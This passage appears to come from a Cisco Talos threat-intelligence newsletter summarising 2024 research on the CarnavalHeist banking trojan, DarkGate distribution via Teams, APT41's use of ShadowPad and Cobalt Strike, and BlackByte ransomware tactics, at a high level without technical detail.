Since February 2024, Cisco Talos observed an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) were common among other banking trojans coming out of Brazil.

**June 5:** **DarkGate switches up its tactics with new payload, email templates**

DarkGate was observed distributing malware through Microsoft Teams and even via malvertising campaigns.

**Aug. 1:** **APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike**

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

**Aug. 28:** **BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities to support ongoing attacks**

In recent investigations, Talos Incident Response observed the BlackByte ransomware group using techniques that depart from their established tradecraft. 

You can always bookmark the Threat Source newsletter to keep up to date with all things Talos threat research.

Latest News